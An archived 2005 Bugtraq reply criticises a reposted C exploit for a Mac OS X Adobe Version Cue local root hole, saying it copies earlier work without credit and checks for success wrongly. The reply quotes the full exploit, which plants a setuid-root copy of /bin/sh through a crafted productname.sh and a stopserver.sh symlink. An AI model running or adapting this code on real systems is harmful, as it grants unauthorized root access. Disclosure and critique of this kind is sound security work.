lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 17 May 2005 23:09:58 -0000 From: Vade 79 <v9@...ehalo.us> To: bugtraq@...urityfocus.com Subject: Re: Mac OS X - Adobe Version Cue local root exploit [c version exploit] In-Reply-To: <20050516180915.6634.qmail@....securityfocus.com> why would you release an exploit for something that was found a year ago(?) by someone else, not reference the original finder and make an exploit in C that simply does the same thing the original exploit did running a bunch of system() commands and then incorrectly-- > if (system("whoami") == a) >printf("\n\n ok system now rooted hehe...:P"); > else >printf("sory this server is patch :(\n"); --check if it was successful at the end. ..meh, i don't flame much, but this one bothered me enough to. >/************************************************************************************************ [ Mac OS X - Adobe Version Cue local root exploit ] > c version exploit > --=== by ActionSpider ===-- > Iam sun-os hehehe ActionSpider@...uxmail.org > >[http://www.Ashiyane.com] >[http://www.Ashiyane.net] >[http://defacers.com.mx ] > >*************************************************************************************************| >Greetz to: [ Behrooz & Nima & Ehsan & str0ke & Status-x & Mafia_Boy & stealh ] >&& >Greetz to: [ and all member of SegmentationFault Group > Code written By ActionSpider Mac OS X - Adobe Version [C] version Exploit;) >\************************************************************************************************/ > >#include <stdio.h> >#include <stdlib.h> >#include <sys/types.h> > > >int main(){ >int x =1; >char a= "root"; > > >printf("\t[ Mac OS X - Adobe Version Cue local root exploit ]\n"); >printf("\t\t--==Code written By ActionSpider==--\n"); >printf("\t\t --=ActionSpider@...uxmail.org=--\n"); >printf("\t\t\t[ www.Ashiayne.com ]\n\n\n"); > > >printf("w8 for geting root man...\n"); >for (x=1;x<=75;x++){ > printf("#");} > > > >printf("\nyour id now:"); >system("id"); >printf("touch productname.sh..."); >system("echo cp /bin/sh /Users/$USER; >> productname.sh"); >system("echo chmod 4755 /Users/$USER/sh; >> productname.sh"); >system("echo chown root /Users/$USER/sh >> productname.sh"); >printf("chmod productname.sh 0755"); >system("chmod 0755 ./productname.sh"); >printf("ok w8 for touch link..."); >system("ln -s $path/stopserver.sh"); >printf("exection it :p hehe\n"); >system("./stopserver.sh"); >system("./sh"); >printf("ok w8 for see system rooted or not \n\n"); > > >system("id"); > if (system("whoami") == a) >printf("\n\n ok system now rooted hehe...:P"); > else >printf("sory this server is patch :(\n"); > >} > > > > > > > > > >
Powered by blists - more mailing lists